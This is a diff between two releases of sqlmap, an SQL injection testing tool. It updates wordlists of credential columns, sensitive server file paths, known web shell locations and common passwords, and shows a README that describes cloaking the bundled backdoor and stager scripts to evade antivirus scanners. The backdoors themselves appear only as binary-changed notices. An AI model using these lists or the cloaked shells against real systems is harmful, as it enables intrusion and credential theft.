diff -Nru sqlmap-1.4.4/COMMITMENT sqlmap-1.5.11.5/COMMITMENT --- sqlmap-1.4.4/COMMITMENT 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/COMMITMENT 1970-01-01 00:00:00.000000000 +0000 @@ -1,46 +0,0 @@ -GPL Cooperation Commitment -Version 1.0 - -Before filing or continuing to prosecute any legal proceeding or claim -(other than a Defensive Action) arising from termination of a Covered -License, we commit to extend to the person or entity ('you') accused -of violating the Covered License the following provisions regarding -cure and reinstatement, taken from GPL version 3. As used here, the -term 'this License' refers to the specific Covered License being -enforced. - - However, if you cease all violation of this License, then your - license from a particular copyright holder is reinstated (a) - provisionally, unless and until the copyright holder explicitly - and finally terminates your license, and (b) permanently, if the - copyright holder fails to notify you of the violation by some - reasonable means prior to 60 days after the cessation. - - Moreover, your license from a particular copyright holder is - reinstated permanently if the copyright holder notifies you of the - violation by some reasonable means, this is the first time you - have received notice of violation of this License (for any work) - from that copyright holder, and you cure the violation prior to 30 - days after your receipt of the notice. - -We intend this Commitment to be irrevocable, and binding and -enforceable against us and assignees of or successors to our -copyrights. - -Definitions - -'Covered License' means the GNU General Public License, version 2 -(GPLv2), the GNU Lesser General Public License, version 2.1 -(LGPLv2.1), or the GNU Library General Public License, version 2 -(LGPLv2), all as published by the Free Software Foundation. - -'Defensive Action' means a legal proceeding or claim that We bring -against you in response to a prior proceeding or claim initiated by -you or your affiliate. - -'We' means each contributor to this repository as of the date of -inclusion of this file, including subsidiaries of a corporate -contributor. - -This work is available under a Creative Commons Attribution-ShareAlike -4.0 International license (https://creativecommons.org/licenses/by-sa/4.0/). diff -Nru sqlmap-1.4.4/data/html/index.html sqlmap-1.5.11.5/data/html/index.html --- sqlmap-1.4.4/data/html/index.html 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/html/index.html 2021-11-12 18:30:56.000000000 +0000 @@ -1,150 +1,151 @@ - + - - - - - - - - - - - - -
- - - -
-
-

DEMO

-
-
-
- - - - + + + DEMO + + + + + + + + + + +
+ + + +
+
+

DEMO

+
+
+
+ + + + Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/shell/backdoors/backdoor.asp_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/shell/backdoors/backdoor.asp_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/shell/backdoors/backdoor.aspx_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/shell/backdoors/backdoor.aspx_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/shell/backdoors/backdoor.jsp_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/shell/backdoors/backdoor.jsp_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/shell/backdoors/backdoor.php_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/shell/backdoors/backdoor.php_ differ diff -Nru sqlmap-1.4.4/data/shell/README.txt sqlmap-1.5.11.5/data/shell/README.txt --- sqlmap-1.4.4/data/shell/README.txt 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/shell/README.txt 2021-11-12 18:30:56.000000000 +0000 @@ -1,7 +1,7 @@ -Due to the anti-virus positive detection of shell scripts stored inside this folder, we needed to somehow circumvent this. As from the plain sqlmap users perspective nothing has to be done prior to their usage by sqlmap, but if you want to have access to their original source code use the decrypt functionality of the ../extra/cloak/cloak.py utility. +Due to the anti-virus positive detection of shell scripts stored inside this folder, we needed to somehow circumvent this. As from the plain sqlmap users perspective nothing has to be done prior to their usage by sqlmap, but if you want to have access to their original source code use the decrypt functionality of the ../../extra/cloak/cloak.py utility. To prepare the original scripts to the cloaked form use this command: -find backdoors/backdoor.* stagers/stager.* -type f -exec python ../extra/cloak/cloak.py -i '{}' \; +find backdoors/backdoor.* stagers/stager.* -type f -exec python ../../extra/cloak/cloak.py -i '{}' \; To get back them into the original form use this: -find backdoors/backdoor.*_ stagers/stager.*_ -type f -exec python ../extra/cloak/cloak.py -d -i '{}' \; +find backdoors/backdoor.*_ stagers/stager.*_ -type f -exec python ../../extra/cloak/cloak.py -d -i '{}' \; Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/shell/stagers/stager.asp_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/shell/stagers/stager.asp_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/shell/stagers/stager.aspx_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/shell/stagers/stager.aspx_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/shell/stagers/stager.jsp_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/shell/stagers/stager.jsp_ differ Binary files /tmp/tmpflscm4dw/b5OpNKisXF/sqlmap-1.4.4/data/shell/stagers/stager.php_ and /tmp/tmpflscm4dw/bGnUAgkDIX/sqlmap-1.5.11.5/data/shell/stagers/stager.php_ differ diff -Nru sqlmap-1.4.4/data/txt/common-columns.txt sqlmap-1.5.11.5/data/txt/common-columns.txt --- sqlmap-1.4.4/data/txt/common-columns.txt 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/txt/common-columns.txt 2021-11-12 18:30:56.000000000 +0000 @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) # See the file 'LICENSE' for copying permission id @@ -485,6 +485,8 @@ chaveta tono cuna +correo +contrasenia # german @@ -798,7 +800,9 @@ nick number nummer +passhash pass_hash +password_hash passwordsalt personal_key phone @@ -2670,6 +2674,7 @@ jenis jml judul +jumlah kata_kunci kata_sandi katakunci @@ -2682,6 +2687,7 @@ lahir nama nama_akun +nama_ibu_kandung nama_pengguna namaakun namapengguna @@ -2691,6 +2697,7 @@ penjelasan perusahaan ponsel +profesi ruang sandi soal @@ -2698,6 +2705,7 @@ surel tanggal tanggal_lahir +telepon tempat tempat_lahir tmp_lahir @@ -2726,3 +2734,4 @@ # Misc u_pass +hashedPw diff -Nru sqlmap-1.4.4/data/txt/common-files.txt sqlmap-1.5.11.5/data/txt/common-files.txt --- sqlmap-1.4.4/data/txt/common-files.txt 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/txt/common-files.txt 2021-11-12 18:30:56.000000000 +0000 @@ -1,6 +1,12 @@ -# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) # See the file 'LICENSE' for copying permission +# CTFs + +/flag +/flag.txt +/readflag + # Reference: https://gist.github.com/sckalath/78ad449346171d29241a /apache/logs/access.log @@ -679,17 +685,6 @@ /.htaccess /.htpasswd -/[jboss]/server/default/conf/jboss-minimal.xml -/[jboss]/server/default/conf/jboss-service.xml -/[jboss]/server/default/conf/jndi.properties -/[jboss]/server/default/conf/log4j.xml -/[jboss]/server/default/conf/login-config.xml -/[jboss]/server/default/conf/server.log.properties -/[jboss]/server/default/conf/standardjaws.xml -/[jboss]/server/default/conf/standardjboss.xml -/[jboss]/server/default/deploy/jboss-logging.xml -/[jboss]/server/default/log/boot.log -/[jboss]/server/default/log/server.log /access.log /access_log /apache/conf/httpd.conf @@ -1024,17 +1019,17 @@ /mysql/my.cnf /mysql/my.ini /netserver/bin/stable/apache/php.ini -/opt/[jboss]/server/default/conf/jboss-minimal.xml -/opt/[jboss]/server/default/conf/jboss-service.xml -/opt/[jboss]/server/default/conf/jndi.properties -/opt/[jboss]/server/default/conf/log4j.xml -/opt/[jboss]/server/default/conf/login-config.xml -/opt/[jboss]/server/default/conf/server.log.properties -/opt/[jboss]/server/default/conf/standardjaws.xml -/opt/[jboss]/server/default/conf/standardjboss.xml -/opt/[jboss]/server/default/deploy/jboss-logging.xml -/opt/[jboss]/server/default/log/boot.log -/opt/[jboss]/server/default/log/server.log +/opt/jboss/server/default/conf/jboss-minimal.xml +/opt/jboss/server/default/conf/jboss-service.xml +/opt/jboss/server/default/conf/jndi.properties +/opt/jboss/server/default/conf/log4j.xml +/opt/jboss/server/default/conf/login-config.xml +/opt/jboss/server/default/conf/server.log.properties +/opt/jboss/server/default/conf/standardjaws.xml +/opt/jboss/server/default/conf/standardjboss.xml +/opt/jboss/server/default/deploy/jboss-logging.xml +/opt/jboss/server/default/log/boot.log +/opt/jboss/server/default/log/server.log /opt/apache/apache.conf /opt/apache/apache2.conf /opt/apache/conf/apache.conf @@ -1075,17 +1070,6 @@ /private/etc/httpd/httpd.conf /private/etc/httpd/httpd.conf.default /private/etc/squirrelmail/config/config.php -/private/tmp/[jboss]/server/default/conf/jboss-minimal.xml -/private/tmp/[jboss]/server/default/conf/jboss-service.xml -/private/tmp/[jboss]/server/default/conf/jndi.properties -/private/tmp/[jboss]/server/default/conf/log4j.xml -/private/tmp/[jboss]/server/default/conf/login-config.xml -/private/tmp/[jboss]/server/default/conf/server.log.properties -/private/tmp/[jboss]/server/default/conf/standardjaws.xml -/private/tmp/[jboss]/server/default/conf/standardjboss.xml -/private/tmp/[jboss]/server/default/deploy/jboss-logging.xml -/private/tmp/[jboss]/server/default/log/boot.log -/private/tmp/[jboss]/server/default/log/server.log /proc/cpuinfo /proc/devices /proc/meminfo @@ -1114,17 +1098,17 @@ /proc/self/stat /proc/self/status /proc/version -/program files/[jboss]/server/default/conf/jboss-minimal.xml -/program files/[jboss]/server/default/conf/jboss-service.xml -/program files/[jboss]/server/default/conf/jndi.properties -/program files/[jboss]/server/default/conf/log4j.xml -/program files/[jboss]/server/default/conf/login-config.xml -/program files/[jboss]/server/default/conf/server.log.properties -/program files/[jboss]/server/default/conf/standardjaws.xml -/program files/[jboss]/server/default/conf/standardjboss.xml -/program files/[jboss]/server/default/deploy/jboss-logging.xml -/program files/[jboss]/server/default/log/boot.log -/program files/[jboss]/server/default/log/server.log +/program files/jboss/server/default/conf/jboss-minimal.xml +/program files/jboss/server/default/conf/jboss-service.xml +/program files/jboss/server/default/conf/jndi.properties +/program files/jboss/server/default/conf/log4j.xml +/program files/jboss/server/default/conf/login-config.xml +/program files/jboss/server/default/conf/server.log.properties +/program files/jboss/server/default/conf/standardjaws.xml +/program files/jboss/server/default/conf/standardjboss.xml +/program files/jboss/server/default/deploy/jboss-logging.xml +/program files/jboss/server/default/log/boot.log +/program files/jboss/server/default/log/server.log /program files/apache group/apache/apache.conf /program files/apache group/apache/apache2.conf /program files/apache group/apache/conf/apache.conf @@ -1177,17 +1161,17 @@ /system/library/webobjects/adaptors/apache2.2/apache.conf /temp/sess_ /thttpd_log -/tmp/[jboss]/server/default/conf/jboss-minimal.xml -/tmp/[jboss]/server/default/conf/jboss-service.xml -/tmp/[jboss]/server/default/conf/jndi.properties -/tmp/[jboss]/server/default/conf/log4j.xml -/tmp/[jboss]/server/default/conf/login-config.xml -/tmp/[jboss]/server/default/conf/server.log.properties -/tmp/[jboss]/server/default/conf/standardjaws.xml -/tmp/[jboss]/server/default/conf/standardjboss.xml -/tmp/[jboss]/server/default/deploy/jboss-logging.xml -/tmp/[jboss]/server/default/log/boot.log -/tmp/[jboss]/server/default/log/server.log +/tmp/jboss/server/default/conf/jboss-minimal.xml +/tmp/jboss/server/default/conf/jboss-service.xml +/tmp/jboss/server/default/conf/jndi.properties +/tmp/jboss/server/default/conf/log4j.xml +/tmp/jboss/server/default/conf/login-config.xml +/tmp/jboss/server/default/conf/server.log.properties +/tmp/jboss/server/default/conf/standardjaws.xml +/tmp/jboss/server/default/conf/standardjboss.xml +/tmp/jboss/server/default/deploy/jboss-logging.xml +/tmp/jboss/server/default/log/boot.log +/tmp/jboss/server/default/log/server.log /tmp/access.log /tmp/sess_ /usr/apache/conf/httpd.conf @@ -1202,17 +1186,17 @@ /usr/lib/php.ini /usr/lib/php/php.ini /usr/lib/security/mkuser.default -/usr/local/[jboss]/server/default/conf/jboss-minimal.xml -/usr/local/[jboss]/server/default/conf/jboss-service.xml -/usr/local/[jboss]/server/default/conf/jndi.properties -/usr/local/[jboss]/server/default/conf/log4j.xml -/usr/local/[jboss]/server/default/conf/login-config.xml -/usr/local/[jboss]/server/default/conf/server.log.properties -/usr/local/[jboss]/server/default/conf/standardjaws.xml -/usr/local/[jboss]/server/default/conf/standardjboss.xml -/usr/local/[jboss]/server/default/deploy/jboss-logging.xml -/usr/local/[jboss]/server/default/log/boot.log -/usr/local/[jboss]/server/default/log/server.log +/usr/local/jboss/server/default/conf/jboss-minimal.xml +/usr/local/jboss/server/default/conf/jboss-service.xml +/usr/local/jboss/server/default/conf/jndi.properties +/usr/local/jboss/server/default/conf/log4j.xml +/usr/local/jboss/server/default/conf/login-config.xml +/usr/local/jboss/server/default/conf/server.log.properties +/usr/local/jboss/server/default/conf/standardjaws.xml +/usr/local/jboss/server/default/conf/standardjboss.xml +/usr/local/jboss/server/default/deploy/jboss-logging.xml +/usr/local/jboss/server/default/log/boot.log +/usr/local/jboss/server/default/log/server.log /usr/local/apache/apache.conf /usr/local/apache/apache2.conf /usr/local/apache/conf/access.conf @@ -1740,6 +1724,7 @@ /etc/php4/apache2/php.ini /etc/php5/apache/php.ini /etc/php5/apache2/php.ini +/etc/php/7.4/apache2/php.ini /etc/php/php.ini /usr/local/apache/conf/modsec.conf /var/cpanel/cpanel.config @@ -1801,4 +1786,24 @@ /etc/httpd/conf.d/squirrelmail.conf /usr/share/squirrelmail/config/config.php /private/etc/squirrelmail/config/config.php -/srv/www/htdos/squirrelmail/config/config.php \ No newline at end of file +/srv/www/htdos/squirrelmail/config/config.php + +# Web shells + +/var/www/html/backdoor.php +/var/www/html/b374k.php +/var/www/html/c99.php +/var/www/html/cmd.php +/var/www/html/r57.php +/var/www/html/shell.php +/var/www/html/wso.php + +# Misc + +/app/app.js +/app/configure.js +/app/config/config.json +/etc/grafana/grafana.ini +/opt/kibana/config/kibana.yml +/etc/kibana/kibana.yml +/etc/elasticsearch/elasticsearch.yml diff -Nru sqlmap-1.4.4/data/txt/common-outputs.txt sqlmap-1.5.11.5/data/txt/common-outputs.txt --- sqlmap-1.4.4/data/txt/common-outputs.txt 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/txt/common-outputs.txt 2021-11-12 18:30:56.000000000 +0000 @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) # See the file 'LICENSE' for copying permission [Banners] @@ -12,7 +12,9 @@ 5.1. 5.5. 5.6. +5.7. 6.0. +8.0. # PostgreSQL PostgreSQL 7.0 @@ -30,6 +32,13 @@ PostgreSQL 9.1 PostgreSQL 9.2 PostgreSQL 9.3 +PostgreSQL 9.4 +PostgreSQL 9.5 +PostgreSQL 9.6 +PostgreSQL 10. +PostgreSQL 11. +PostgreSQL 12. +PostgreSQL 13. # Oracle Oracle Database 9i Standard Edition Release @@ -49,12 +58,18 @@ Oracle Database 11g Express Edition Release 11. Oracle Database 11g Enterprise Edition Release Oracle Database 11g Enterprise Edition Release 11. +Oracle Database 12c # Microsoft SQL Server Microsoft SQL Server 7.0 Microsoft SQL Server 2000 Microsoft SQL Server 2005 Microsoft SQL Server 2008 +Microsoft SQL Server 2012 +Microsoft SQL Server 2014 +Microsoft SQL Server 2016 +Microsoft SQL Server 2017 +Microsoft SQL Server 2019 [Users] diff -Nru sqlmap-1.4.4/data/txt/common-tables.txt sqlmap-1.5.11.5/data/txt/common-tables.txt --- sqlmap-1.4.4/data/txt/common-tables.txt 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/txt/common-tables.txt 2021-11-12 18:30:56.000000000 +0000 @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) # See the file 'LICENSE' for copying permission users @@ -1825,6 +1825,7 @@ jos_joomblog_users jos_moschat_users knews_lostpass +korisnik korisnici kpro_adminlogs kpro_user @@ -2215,6 +2216,7 @@ admin_pass adminpassword admin_password +admin_passwords usrpass usr_pass pass @@ -3221,6 +3223,10 @@ Books grupo facturas +aclaraciones +preguntas +personas +estadisticas # site:cn @@ -3497,3 +3503,78 @@ wm_products wp_payout_history zamowienia + +# https://deliciousbrains.com/tour-wordpress-database/ + +wp_blogmeta +wp_blogs +wp_blog_versions +wp_commentmeta +wp_comments +wp_links +wp_options +wp_postmeta +wp_posts +wp_registration_log +wp_signups +wp_site +wp_sitemeta +wp_termmeta +wp_term_relationships +wp_terms +wp_term_taxonomy +wp_usermeta +wp_users + +# https://docs.joomla.org/Tables + +assets +bannerclient +banner +bannertrack +categories +components +contact_details +content_frontpage +content_rating +content +core_acl_aro_groups +core_acl_aro_map +core_acl_aro_sections +core_acl_aro +core_acl_groups_aro_map +core_log_items +core_log_searches +extensions +groups +languages +menu +menu_types +messages_cfg +messages +migration_backlinks +modules_menu +modules +newsfeeds +plugins +poll_data +poll_date +poll_menu +polls +redirect_links +Schemas +sections +session +stats_agents +templates_menu +template_styles +update_categories +update_sites_extensions +update_sites +updates +usergroups +user_profiles +users +user_usergroup_map +viewlevels +weblinks diff -Nru sqlmap-1.4.4/data/txt/keywords.txt sqlmap-1.5.11.5/data/txt/keywords.txt --- sqlmap-1.4.4/data/txt/keywords.txt 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/txt/keywords.txt 2021-11-12 18:30:56.000000000 +0000 @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) # See the file 'LICENSE' for copying permission # SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml) @@ -452,26 +452,13 @@ YEAR_MONTH ZEROFILL -# PostgreSQL keywords (reference: https://www.postgresql.org/docs/9.3/sql-keywords-appendix.html) +# PostgreSQL|SQL:2016|SQL:2011 reserved words (reference: https://www.postgresql.org/docs/current/sql-keywords-appendix.html) -A -ABORT ABS -ABSENT -ABSOLUTE -ACCESS -ACCORDING -ACTION -ADA -ADD -ADMIN -AFTER -AGGREGATE +ACOS ALL ALLOCATE -ALSO ALTER -ALWAYS ANALYSE ANALYZE AND @@ -483,110 +470,61 @@ AS ASC ASENSITIVE -ASSERTION -ASSIGNMENT +ASIN ASYMMETRIC AT +ATAN ATOMIC -ATTRIBUTE -ATTRIBUTES AUTHORIZATION AVG -BACKWARD -BASE64 -BEFORE BEGIN BEGIN_FRAME BEGIN_PARTITION -BERNOULLI BETWEEN BIGINT BINARY -BIT -BIT_LENGTH BLOB -BLOCKED -BOM BOOLEAN BOTH -BREADTH BY -C -CACHE CALL CALLED CARDINALITY -CASCADE CASCADED CASE CAST -CATALOG -CATALOG_NAME CEIL CEILING -CHAIN CHAR CHARACTER -CHARACTERISTICS -CHARACTERS CHARACTER_LENGTH -CHARACTER_SET_CATALOG -CHARACTER_SET_NAME -CHARACTER_SET_SCHEMA CHAR_LENGTH CHECK -CHECKPOINT -CLASS -CLASS_ORIGIN +CLASSIFIER CLOB CLOSE -CLUSTER COALESCE -COBOL COLLATE COLLATION -COLLATION_CATALOG -COLLATION_NAME -COLLATION_SCHEMA COLLECT COLUMN -COLUMNS -COLUMN_NAME -COMMAND_FUNCTION -COMMAND_FUNCTION_CODE -COMMENT -COMMENTS COMMIT -COMMITTED CONCURRENTLY CONDITION -CONDITION_NUMBER -CONFIGURATION CONNECT -CONNECTION -CONNECTION_NAME CONSTRAINT -CONSTRAINTS -CONSTRAINT_CATALOG -CONSTRAINT_NAME -CONSTRAINT_SCHEMA -CONSTRUCTOR CONTAINS -CONTENT -CONTINUE -CONTROL -CONVERSION CONVERT COPY CORR CORRESPONDING -COST +COS +COSH COUNT COVAR_POP COVAR_SAMP CREATE CROSS -CSV CUBE CUME_DIST CURRENT @@ -602,44 +540,25 @@ CURRENT_TRANSFORM_GROUP_FOR_TYPE CURRENT_USER CURSOR -CURSOR_NAME CYCLE -DATA -DATABASE DATALINK DATE -DATETIME_INTERVAL_CODE -DATETIME_INTERVAL_PRECISION DAY -DB DEALLOCATE DEC +DECFLOAT DECIMAL DECLARE DEFAULT -DEFAULTS DEFERRABLE -DEFERRED -DEFINED -DEFINER -DEGREE +DEFINE DELETE -DELIMITER -DELIMITERS DENSE_RANK -DEPTH DEREF -DERIVED DESC DESCRIBE -DESCRIPTOR DETERMINISTIC -DIAGNOSTICS -DICTIONARY -DISABLE -DISCARD DISCONNECT -DISPATCH DISTINCT DLNEWCOPY DLPREVIOUSCOPY @@ -653,313 +572,176 @@ DLURLSERVER DLVALUE DO -DOCUMENT -DOMAIN DOUBLE DROP DYNAMIC -DYNAMIC_FUNCTION -DYNAMIC_FUNCTION_CODE EACH ELEMENT ELSE EMPTY -ENABLE -ENCODING -ENCRYPTED END END-EXEC END_FRAME END_PARTITION -ENFORCED -ENUM EQUALS ESCAPE -EVENT EVERY EXCEPT -EXCEPTION -EXCLUDE -EXCLUDING -EXCLUSIVE EXEC EXECUTE EXISTS EXP -EXPLAIN -EXPRESSION -EXTENSION EXTERNAL EXTRACT FALSE -FAMILY FETCH -FILE FILTER -FINAL -FIRST FIRST_VALUE -FLAG FLOAT FLOOR -FOLLOWING FOR -FORCE FOREIGN -FORTRAN -FORWARD -FOUND FRAME_ROW FREE FREEZE FROM -FS FULL FUNCTION -FUNCTIONS FUSION -G -GENERAL -GENERATED GET GLOBAL -GO -GOTO GRANT -GRANTED -GREATEST GROUP GROUPING GROUPS -HANDLER HAVING -HEADER -HEX -HIERARCHY HOLD HOUR -ID IDENTITY -IF -IGNORE ILIKE -IMMEDIATE -IMMEDIATELY -IMMUTABLE -IMPLEMENTATION -IMPLICIT IMPORT IN -INCLUDING -INCREMENT -INDENT -INDEX -INDEXES INDICATOR -INHERIT -INHERITS +INITIAL INITIALLY -INLINE INNER INOUT -INPUT INSENSITIVE INSERT -INSTANCE -INSTANTIABLE -INSTEAD INT INTEGER -INTEGRITY INTERSECT INTERSECTION INTERVAL INTO -INVOKER IS ISNULL -ISOLATION JOIN -K -KEY -KEY_MEMBER -KEY_TYPE -LABEL +JSON_ARRAY +JSON_ARRAYAGG +JSON_EXISTS +JSON_OBJECT +JSON_OBJECTAGG +JSON_QUERY +JSON_TABLE +JSON_TABLE_PRIMITIVE +JSON_VALUE LAG LANGUAGE LARGE -LAST LAST_VALUE LATERAL -LC_COLLATE -LC_CTYPE LEAD LEADING -LEAKPROOF -LEAST LEFT -LENGTH -LEVEL -LIBRARY LIKE LIKE_REGEX LIMIT -LINK -LISTEN +LISTAGG LN -LOAD LOCAL LOCALTIME LOCALTIMESTAMP -LOCATION -LOCATOR -LOCK +LOG +LOG10 LOWER -M -MAP -MAPPING MATCH -MATCHED -MATERIALIZED +MATCHES +MATCH_NUMBER +MATCH_RECOGNIZE MAX -MAXVALUE -MAX_CARDINALITY +MEASURES MEMBER MERGE -MESSAGE_LENGTH -MESSAGE_OCTET_LENGTH -MESSAGE_TEXT METHOD MIN MINUTE -MINVALUE MOD -MODE MODIFIES MODULE MONTH -MORE -MOVE MULTISET -MUMPS -NAME -NAMES -NAMESPACE NATIONAL NATURAL NCHAR NCLOB -NESTING NEW -NEXT -NFC -NFD -NFKC -NFKD -NIL NO NONE NORMALIZE -NORMALIZED NOT -NOTHING -NOTIFY NOTNULL -NOWAIT NTH_VALUE NTILE NULL -NULLABLE NULLIF -NULLS -NUMBER NUMERIC -OBJECT OCCURRENCES_REGEX -OCTETS OCTET_LENGTH OF -OFF OFFSET -OIDS OLD +OMIT ON +ONE ONLY OPEN -OPERATOR -OPTION -OPTIONS OR ORDER -ORDERING -ORDINALITY -OTHERS OUT OUTER -OUTPUT OVER OVERLAPS OVERLAY -OVERRIDING -OWNED -OWNER -P -PAD PARAMETER -PARAMETER_MODE -PARAMETER_NAME -PARAMETER_ORDINAL_POSITION -PARAMETER_SPECIFIC_CATALOG -PARAMETER_SPECIFIC_NAME -PARAMETER_SPECIFIC_SCHEMA -PARSER -PARTIAL PARTITION -PASCAL -PASSING -PASSTHROUGH -PASSWORD -PATH +PATTERN +PER PERCENT PERCENTILE_CONT PERCENTILE_DISC PERCENT_RANK PERIOD -PERMISSION +PERMUTE PLACING -PLANS -PLI PORTION POSITION POSITION_REGEX POWER PRECEDES -PRECEDING PRECISION PREPARE -PREPARED -PRESERVE PRIMARY -PRIOR -PRIVILEGES -PROCEDURAL PROCEDURE -PROGRAM -PUBLIC -QUOTE +PTF RANGE RANK -READ READS REAL -REASSIGN -RECHECK -RECOVERY RECURSIVE REF REFERENCES REFERENCING -REFRESH REGR_AVGX REGR_AVGY REGR_COUNT @@ -969,185 +751,87 @@ REGR_SXX REGR_SXY REGR_SYY -REINDEX -RELATIVE RELEASE -RENAME -REPEATABLE -REPLACE -REPLICA -REQUIRING -RESET -RESPECT -RESTART -RESTORE -RESTRICT RESULT RETURN -RETURNED_CARDINALITY -RETURNED_LENGTH -RETURNED_OCTET_LENGTH -RETURNED_SQLSTATE RETURNING RETURNS REVOKE RIGHT -ROLE ROLLBACK ROLLUP -ROUTINE -ROUTINE_CATALOG -ROUTINE_NAME -ROUTINE_SCHEMA ROW ROWS -ROW_COUNT ROW_NUMBER -RULE +RUNNING SAVEPOINT -SCALE -SCHEMA -SCHEMA_NAME SCOPE -SCOPE_CATALOG -SCOPE_NAME -SCOPE_SCHEMA SCROLL SEARCH SECOND -SECTION -SECURITY +SEEK SELECT -SELECTIVE -SELF SENSITIVE -SEQUENCE -SEQUENCES -SERIALIZABLE -SERVER -SERVER_NAME -SESSION SESSION_USER SET -SETOF -SETS -SHARE SHOW SIMILAR -SIMPLE -SIZE +SIN +SINH +SKIP SMALLINT -SNAPSHOT SOME -SOURCE -SPACE SPECIFIC SPECIFICTYPE -SPECIFIC_NAME SQL -SQLCODE -SQLERROR SQLEXCEPTION SQLSTATE SQLWARNING SQRT -STABLE -STANDALONE START -STATE -STATEMENT STATIC -STATISTICS STDDEV_POP STDDEV_SAMP -STDIN -STDOUT -STORAGE -STRICT -STRIP -STRUCTURE -STYLE -SUBCLASS_ORIGIN SUBMULTISET +SUBSET SUBSTRING SUBSTRING_REGEX SUCCEEDS SUM SYMMETRIC -SYSID SYSTEM SYSTEM_TIME SYSTEM_USER -T TABLE -TABLES TABLESAMPLE -TABLESPACE -TABLE_NAME -TEMP -TEMPLATE -TEMPORARY -TEXT +TAN +TANH THEN -TIES TIME TIMESTAMP TIMEZONE_HOUR TIMEZONE_MINUTE TO -TOKEN -TOP_LEVEL_COUNT TRAILING -TRANSACTION -TRANSACTIONS_COMMITTED -TRANSACTIONS_ROLLED_BACK -TRANSACTION_ACTIVE -TRANSFORM -TRANSFORMS TRANSLATE TRANSLATE_REGEX TRANSLATION TREAT TRIGGER -TRIGGER_CATALOG -TRIGGER_NAME -TRIGGER_SCHEMA TRIM TRIM_ARRAY TRUE TRUNCATE -TRUSTED -TYPE -TYPES UESCAPE -UNBOUNDED -UNCOMMITTED -UNDER -UNENCRYPTED UNION UNIQUE UNKNOWN -UNLINK -UNLISTEN -UNLOGGED -UNNAMED +UNMATCHED UNNEST -UNTIL -UNTYPED UPDATE UPPER -URI -USAGE USER -USER_DEFINED_TYPE_CATALOG -USER_DEFINED_TYPE_CODE -USER_DEFINED_TYPE_NAME -USER_DEFINED_TYPE_SCHEMA USING -VACUUM -VALID -VALIDATE -VALIDATOR VALUE VALUES VALUE_OF @@ -1158,22 +842,15 @@ VAR_POP VAR_SAMP VERBOSE -VERSION VERSIONING -VIEW -VOLATILE WHEN WHENEVER WHERE -WHITESPACE WIDTH_BUCKET WINDOW WITH WITHIN WITHOUT -WORK -WRAPPER -WRITE XML XMLAGG XMLATTRIBUTES @@ -1181,7 +858,6 @@ XMLCAST XMLCOMMENT XMLCONCAT -XMLDECLARATION XMLDOCUMENT XMLELEMENT XMLEXISTS @@ -1191,12 +867,8 @@ XMLPARSE XMLPI XMLQUERY -XMLROOT -XMLSCHEMA XMLSERIALIZE XMLTABLE XMLTEXT XMLVALIDATE YEAR -YES -ZONE diff -Nru sqlmap-1.4.4/data/txt/smalldict.txt sqlmap-1.5.11.5/data/txt/smalldict.txt --- sqlmap-1.4.4/data/txt/smalldict.txt 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/data/txt/smalldict.txt 2021-11-12 18:30:56.000000000 +0000 @@ -1,26 +1,50 @@ ------- !@#$% !@#$%^ !@#$%^& !@#$%^&* -@#$%^& * +***** +****** +------ 0 +0.0.0.000 +0.0.000 0000 00000 000000 0000000 00000000 +0000007 +000001 +000007 0007 +0069 007 007007 +007bond +0101 +010101 01011980 01012011 010203 +0123 +012345 +0123456 +01234567 0123456789 +020202 +030303 +0420 +050505 06071992 +0660 +0815 +090909 +0911 +0987 098765 +09876543 0987654321 0racl3 0racl38 @@ -33,28 +57,103 @@ 0racle9 0racle9i 1 +1000 +100000 +1001 +100100 +1002 +1003 +1004 +1005 +1007 +1008 +1010 101010 +10101010 +1011 +1012 +1013 +1014 +1015 +1016 +1017 +1018 +1020 102030 1022 +1023 +1024 +1025 +1026 +1027 +1028 +1029 +102938 +1030 +1031 +1066 10sne1 +1101 +1102 +1103 +1104 1111 11111 111111 1111111 11111111 1111111111 +11112222 +1112 111222 +1114 +1115 +1117 +1120 +1121 